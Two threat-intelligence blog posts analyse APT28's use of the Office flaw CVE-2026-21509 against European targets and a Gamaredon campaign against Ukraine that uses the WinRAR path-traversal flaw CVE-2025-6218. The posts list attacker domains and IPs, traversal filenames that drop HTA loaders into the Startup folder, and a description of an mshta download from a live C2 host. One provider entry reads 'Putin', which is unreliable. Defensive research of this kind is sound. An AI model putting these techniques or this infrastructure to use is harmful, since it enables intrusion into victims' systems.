EDIT: 04.02.2026: I have YARA Rules available for detection, contact me at contact@robin-dost.de if you need them.
After publishing this article, I received technical feedback regarding the root cause of CVE-2026-21509. Based on that input, I corrected several parts of the analysis.
Update Notes: The vulnerability does not rely on malformed OLE objects, and WebDAV is not part of the exploit primitive. CVE-2026-21509 is caused by an allowlist gap around Shell.Explorer.1, which Office still instantiates. WebDAV is only used as a delivery mechanism. The article has been updated accordingly.
Since the beginning of this year, we have again observed an increased number of attacks by APT28 targeting various European countries. In multiple campaigns, the group actively leverages the Microsoft Office vulnerability CVE-2026-21509 as an initial access vector.
This article focuses on how CVE-2026-21509 is used in practice, how relevant IOCs can be extracted efficiently from weaponized Word documents and how the actors own geofencing can be leveraged to infer operational target regions.
Before diving into the analysis, a brief look at CVE-2026-21509 itself.
Understanding CVE-2026-21509 (Click)
CVE-2026-21509 comes down to a simple allowlist gap in Office.
Microsoft has been blocking browser OLE objects like Shell.Explorer and Shell.Explorer.2 for years. Shell.Explorer.1 just never made it onto that list. Attackers embed a Shell.Explorer.1 OLE object inside an RTF document. When Word parses the file, the object gets reconstructed and instantiated normally, because from Offices point of view it is still considered allowed. No macros. No scripts. No fancy exploit chain. Just a forgotten COM class. Once loaded, the embedded browser object calls Navigate() and points to a remote resource, usually a .lnk file, which then becomes the actual execution vector. The document itself carries no payload. Its only purpose is to reach a state where Shell.Explorer.1 is active and allowed to fetch external content. Variations of this technique have been public since at least 2016-2018. CVE-2026-21509 merely formalizes Microsoft finally acknowledging that this specific ProgID should probably have been blocked a long time ago.
tldr;
APT28 abuses CVE-2026-21509 by embedding a forgotten OLE browser object (Shell.Explorer.1) into RTF documents. Office happily instantiates it, the object navigates to a remote .lnk, and thats your execution path. An allowlist gap that somehow survived for years. The documents themselves contain no payload. They only exist to get Office into a state where external shortcut files can be fetched. From there, the real infection chain starts.
Analyzed Samples
For this analysis, I looked at the following samples:
When I receive potentially malicious Word documents, my first step is usually to run oleid. In most common malicious documents, this already reveals macros, external references or other active content.
In this case, oleid reports a clean file. No macros, no external relationships, no obvious indicators.
This is expected.
The document is not a classic OLE container but an RTF file. In RTF, embedded objects are stored as hexadecimal data inside the document body using control words such as \object and \objdata. These objects do not exist as real OLE structures until Word parses the document and reconstructs them in memory.
oleid operates at the container level. It can only detect features that already exist as structured objects in the file. Since the embedded OLE data is still plain text at this stage, there is nothing for oleid to flag.
The exploit surface of CVE-2026-21509 only becomes visible after this reconstruction step. Tools like rtfobj replicate this part of WordS parsing logic by extracting and rebuilding the embedded objects from the RTF stream.
rtfobj -s all b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546.doc
Once reconstructed, the embedded objects resolve to Shell.Explorer.1. Some tools flag the CLSID as unknown, but Windows loads it normally. The containers themselves are valid OLE objects. The vulnerability is triggered solely because this specific ProgID is still allowed.
After extracting the embedded objects, I inspected the resulting files using xxd. At this stage, strings did not yield anything particularly useful, which is not surprising given that the document is not designed to carry a readable payload.
From this data, the following strings could be extracted:
This is more an operational choice, then a technical requirement of CVE-2026-21509. The same behavior can be triggered using plain HTTP or HTTPS URLs. The exploit primitive is simple: the embedded Shell.Explorer.1 object calls Navigate() to a remote URI. What happens next is handled by the legacy Internet Explorer engine (ieframe.dll), which does not implement modern protections such as SmartScreen or Smart Application Control. WebDAV mainly provides delivery convenience. It exposes remote files as filesystem-like objects via the Windows WebClient service, but it does not change the exploit mechanics. As already mentioned, the Word document itself contains no payload and performs no execution. Its only purpose is to instantiate Shell.Explorer.1 and trigger navigation to a remote shortcut file. The .lnk becomes the actual execution vector. When accessed, the user is prompted to open or save the file, and any follow-on activity happens outside the document. The query parameter is client-side only and used to avoid caching. It has no functional relevance for the server.
Identifying Targets
While analyzing the documents and extracted URLs, it became apparent that they reference potential target regions:
/cz/ -> Czech Republic
/buch/ -> Bucharest / Romania
/pol/ -> Poland
Additional indicators inside the Word documents further support this assessment:
Romanian language content
References to Ukraine
Mentions of Slovenia
EU-related context
None of this is accidental.
At this point, the next step is validation. Russian threat actors are known to rely heavily on geofencing and APT28 is no exception. Fortunately, this behavior can be turned into a useful source of intelligence for us ^-^
Turning Geofencing into Intelligence
The first step was to take a closer look at the domains extracted from the samples:
wellnessmedcare.org
193.187.148.169
freefoodaid.com
159.253.120.2
What stands out here is the choice of hosting locations. Both IP addresses resolve to providers in Romania and Moldova. It is reasonable to assume that these locations were selected based on the campaigns intended target regions.
Next, I attempted to replicate the WebDAV requests generated by Windows in order to test the observed geofencing behavior. To do this, I executed the document in a sandbox and captured the resulting network traffic.
Geofence Analysis
To validate the geofencing, I needed to determine which proxy locations were required to access the malicious resources without being blocked. After identifying suitable proxies, I performed test requests using a custom script, once without a proxy and once using a Romanian proxy.
Without proxy:
With proxy:
The result is fairly clear. Requests originating from outside the expected regions are rejected with HTTP 403, while requests routed through a Romanian proxy succeed. This pattern can be used to validate likely operational target regions.
Out of 114 tested countries, only three were allowed access: Czech Republic, Poland and Romania. This aligns perfectly with the indicators observed earlier in the documents and URLs.
As this example shows, defensive measures such as geofencing can provide valuable intelligence when analyzed properly. Even access control mechanisms can leak information about an actors operational focus if you know where to look. The second domain, freefoodaid.com, was already offline at the time of analysis. Given how short-lived APT28 infrastructure tends to be, this is hardly surprising. It is reasonable to assume that similar geofencing behavior would have been observable there as well, but for demonstration purposes, the remaining data is more than sufficient.
How to protect against these attacks
Update Microsoft Office and enforce a structured update routine. Treat unexpected Word documents as untrusted and have them analyzed before opening them. (or stop using windows :3)
Conclusion
CVE-2026-21509 works because it fits neatly into how Office processes documents today. The exploit relies on Office instantiating an allowed OLE object during normal parsing, not on macros or embedded payloads, which makes it easy to overlook during initial analysis. The tradecraft follows a familiar pattern. Remote shortcut files and strict geofencing have been used by APT28 before and continue to show up in current campaigns. WebDAV appears here mainly as a delivery detail. The technique is stable, requires little user interaction, and sidesteps many modern Office protections by falling back to legacy browser behavior. At the same time, this setup exposes useful signals. Geofencing decisions, hosting locations and access behavior provide insight into intended target regions when tested systematically.
In this case, the infrastructure behavior aligns closely with the indicators found inside the documents. From an analytical POV, the value lies less in the exploit itself and more in what can be inferred from how it is deployed and constrained.
How a Russian Threat Actor Uses a Recent WinRAR Vulnerability in Their Ukraine Operations
Today we’re taking a look at several malware samples from the advanced persistent threat group “Primitive Bear” aka “Gamaredon”.
Primitive Bear is a Russian state-sponsored Advanced Persistent Threat (APT) group that has been active since at least 2013. With high confidence, the group is attributed to the Federal Security Service of the Russian Federation (FSB), Russia’s domestic intelligence service.
The most recently circulating malware samples caught my attention because they all follow the same pattern and exploit a newly disclosed vulnerability CVE-2025-6218 to load additional malware in later stages.
In this post, I want to walk you through the methodology and the infrastructure used by the attacker.
Below is an overview of the samples I analyzed that make use of CVE-2025-6218, along with their origin. I will continue analyzing additional samples in order to map the attacker’s infrastructure as comprehensively as possible.
Повістка про виклик_357-16230-25_24.10.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_357-16230-25_24.10.2025.HTA
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_11.11.2025.HTA
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2-3716-25_07.11.2025.HTA
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_11-967_10.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_11.11.2025.HTA
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_1_1_7755_12.11.2025.HTA
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_3_8_2_7442_13.11.2025.HTA
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf:.._.._.._.._.._.._AppData_Roaming_Microsoft_Windows_Start Menu_Programs_Startup_2_7_4_62_13.11.2025.HTA
The campaign I observed clearly targets Ukrainian entities, something we can identify mainly by the filenames used:
Original Filename
English Translation
Повістка про виклик_357-16230-25_24.10.2025.pdf
Subpoena_357-16230-25_24.10.2025.pdf
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf
Regarding the provision of information (military unit A0135_11-967_11.11.2025).pdf
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf
Review of approaches to conscription during mobilisation_2-3716-25_07.11.2025.pdf
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf
Request for information from the commander of military unit A0135_11-967_10.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf
Transfer via automated control system Dnipro_2_1_1_7755_11.11.2025.pdf
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf
Transfer via automated control system Dnipro_2_1_1_7755_12.11.2025.pdf
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf
Transfer via automated control system Dnipro_3_8_2_7442_13.11.2025.pdf
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf
Transfer via automated control system Dnipro_2_7_4_62_13.11.2025.pdf
Primitive Bear is well-known for its spear-phishing operations, so none of this is surprising. What is new, however, is the use of RAR archives to load additional malware. Unfortunately, we cannot definitively identify all recipients of these samples, but the filenames give us a pretty good idea of who they were intended for:
File
Probable recipient / Context
Derived from the name
Повістка про виклик_357-16230-25_24.10.2025.pdf
Authorities/judiciary or territorial recruitment centers (ТЦК та СП) for mobilization
“Повістка” can mean court/investigative authority or military summons.
Щодо надання інформації (військова частина А0135_11-967_11.11.2025).pdf
Military Unit A0135 (Військова частина А0135)
explicit mention of the unit
Перегляд підходів до призову під час мобілізації_2-3716-25_07.11.2025.pdf
Mobilization/personnel offices: ТЦК та СП, Mobilization Department in the MoD/General Staff
Thematic focus: “Approaches to convening”
Запит на отримання інформації командира військової частини А0135_11-967_10.11.2025.pdf
Commander of military unit A0135
explicitly addressed
Передати засобами АСУ Дніпро_2_1_1_7755_11.11.2025.pdf
Positions with access to “АСУ Днепр” (АСУ = Automated Management/Information Systems) This is typically MoD/ТЦК/Human Resources
“Transmit via ASU Dnipro” -> internal administration/data channel
Передати засобами АСУ Дніпро_2_1_1_7755_12.11.2025.pdf
as above
Series/sequel document (different date)
Передати засобами АСУ Дніпро_3_8_2_7442_13.11.2025.pdf
as above
other internal classification/filing codes
Передати засобами АСУ Дніпро_2_7_4_62_13.11.2025.pdf
as above
Now that we better understand the context of the samples, we can dive into the actual analysis. Since all samples share a nearly identical structure, we’ll look at the most recent one found, with the hash 237696ecc370688a8d1894eb2f95af53a3c0f8d42eb540b7f529b4d4f4492bc0
The victim receives a RAR archive containing two files: a fake PDF and a HTML Application (HTA). The HTA file always has the same bizarre naming scheme:
This immediately reveals the exploitation of CVE-2025-6218.
The vulnerability is a critical directory traversal -> remote code execution (RCE)flaw in WinRAR (up to version 7.11) on Windows. The bug lies in how RAR archives process file paths: an attacker can craft an archive entry that writes files outside the intended extraction folder e.g., directly into the user’s Startup directory.
Once a file lands in an auto-executed location, it runs on next login or reboot, resulting in RCE with the current user’s privileges. It still requires user interaction, such as opening a malicious archive. The issue is fixed in WinRAR 7.12 (Beta 1) and later.
If you want to get a feeling for the vulnerability, a PoC is definitely worth looking at.
So what actually happens when the victim opens the RAR file?
The user opens the archive.
The archive extracts a .pdf into the current directory.
The archive silently extracts an .hta containing obfuscated VBScript into the Startup folder.
After reboot, the VBScript fetches additional malware.
It’s worth noting that the exploitation of CVE-2025-6218 requires only minimal user interaction. In most cases, the victim merely has to open the malicious RAR archive. No special system configuration is required, no sandbox needs to be disabled, and no “advanced mode” must be enabled. WinRAR’s default extraction behavior is sufficient for the path traversal to write an HTA file directly into the user’s Startup folder.
long story short: the attacker relies only on the victim doing what victims do best, double-clicking whatever lands in their inbox.
Now let’s take a look at what such an HTA file actually looks like:
We see an obfuscation attempt that is, let’s put it politely, more bad than good. Between the actual payload there’s a lot of junk lines:
These can be filtered out easily by looking at each assigned variable. If a variable never gets used or only references itself, it can be safely removed. I did the cleanup manually, because the scripts are tiny and the obfuscation is by no means a masterpiece.
After removing the junk lines and renaming the important variables, I ended up with the following result:
The entire deobfuscation process took about five minutes. The script isn’t complex, so let’s walk through it.
The string pretends to be a legitimate Windows component.
Using mshta.exe is classic: this Windows binary can directly execute remotely hosted HTA/HTML scripts, a typical Living-off-the-Land Binary (LOLBIN) abuse.
president.gov.ua@ looks like an official Ukrainian domain
the real host is readers.serveirc.com, a free DynDNS subdomain acting as C2 or malware hosting server.
3. It executes the payload silently
wshell.Run payload
4. Error suppression
On Error Resume Next
Runtime errors are ignored to avoid crashes or prompts.
5. It closes itself
Close
The script exists purely as a loader/downloader. No real payload is inside, instead it fetches the actual malware (another HTA, VBS, or EXE) from readers.serveirc.com.
This aligns perfectly with Primitive Bear’s usual TTPs:
multi-stage payload chains ending in backdoors for surveillance and exfiltration (e.g., Pteranodon, GammaLoad)
abuse of Windows-native binaries (mshta.exe, wscript.exe)
phishing documents themed around Ukrainian government topics (e.g., “повістка.pdf”)
fast-changing C2 infrastructure on free DNS services (serveirc.com, myftp.biz, ddns.net)
Primitive Bear’s operations often end in the deployment of modular backdoors such as Pteranodon or GammaLoad, both of which are staples of the group’s espionage toolkit:
Pteranodon: A long-running backdoor family used by Primitive Bear since at least 2016. It supports classic cyber-espionage features such as screenshot capture, file exfiltration, keystroke logging, command execution, and staged payload delivery. Modular, noisy, but effective enough for long-term access.
GammaLoad: A lightweight downloader/backdoor frequently used as the “next stage” after initial compromise. Typically retrieves secondary modules, maintains C2 connectivity, and prepares the system for more persistent implants. Often deployed through simple LOLBIN-based loaders (like the one used here).
Nothing revolutionary, just FSB’s usual grab-bag of surveillance toys 😉
Infrastructure used in the 2025 Ukraine Campaign (so far)
Throughout my analysis, I reviewed a large number of recent samples (October – November) from this threat actor. Below is a summary and visualization of the infrastructure I identified.
The actor makes heavy use of DynDNS subdomains, such as:
readers.serveirc.com
dears.serveirc.com …and many others
All of these can be attributed to No-IP, which gives us a pool of recurring IP addresses (including IPs not associated with a Dyn-DNS domain name):
IP-Address
Provider
Country
194.58.66.5
BAXET-GROUP-INC – interlir.com
India
194.58.66.132
BAXET-GROUP-INC – interlir.com
India
194.58.66.192
BAXET-GROUP-INC – interlir.com
India
194.87.240.141
relcom.com
Czech Republic
194.87.230.166
BAXET-GROUP-INC – interlir.com
Greece
194.87.240.215
relcom.com
Czech Republic
185.39.204.82
globconnex.com
Turkey
45.141.234.234
globconnex.com
Ireland
5.8.18.46
Putin
Russia
Some of these IP addresses are provided by InterLIR, including the realcom addresses. InterLIR is essentially an IP address marketplace: companies in need of IPv4 or IPv6 space can buy, rent, or sub-lease unused ranges. The platform advertises fast provisioning, legally vetted transfers, and a European business focus.
Since IPv4 addresses are scarce (and expensive), entire micro-economies have formed around services like this, which attackers happily exploit for disposable infrastructure.
I also rechecked which of the domains still resolve to an active host. During that process, I identified fourteen domains that are currently still active and are likely still being used by the threat actor.
acess-pdf.webhop.me
backup.9fvzesn.us
creates.webhop.me
dears.serveirc.com
digitall.webhop.me
dilopendos.serveirc.com
fixer.serveirc.com
google-pdf.redirectme.net
hosting-redirect.sytes.net
political-news.serveirc.com
freedynamicdns.net
readers.serveirc.com
serversftp.serveirc.com
yeard.serveirc.com
Based on the information available so far, we can also compile a final overview of the files that have been distributed through this infrastructure:
This is not the full list of distributed files in this campaign, but i’ll keep track of further samples and update the list accordingly.
Recommendations for Defenders and Blue Teams
To mitigate and detect this campaign (and similar WinRAR-based exploitation attempts), i recommend the following defensive measures:
Update WinRAR immediately Ensure that WinRAR is updated to version 7.12 (Beta 1) or later, where CVE-2025-6218 has been patched.
Block execution of HTA files In most enterprise environments, .hta files should not be executed at all. Enforce this via AppLocker, WDAC, or enterprise GPO restrictions.
Monitor for LOLBIN misuse Flag suspicious executions of:
mshta.exe
wscript.exe
powershell.exe (especially with remote URLs)
Monitor the Startup folder Creation of .hta, .vbs, .js, or unknown executables inside: %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup …should always be treated as high-severity alerts, alway have an eye on this lol.
Inspect email attachments Particularly RAR/ZIP archives containing unusual path structures or files with “hidden extensions” (file.pdf:.hta, etc.).
Network defense Block known C2 domains and sinkhole DynDNS-based infrastructure where possible.
Endpoint logging Ensure Sysmon or a comparable EDR solution logs:
Process creation
File modification in Startup paths
Network connections from LOLBINs
Suspicious command-line parameters
Basically: watch for anything that behaves like Windows, but shouldn’t ^-^
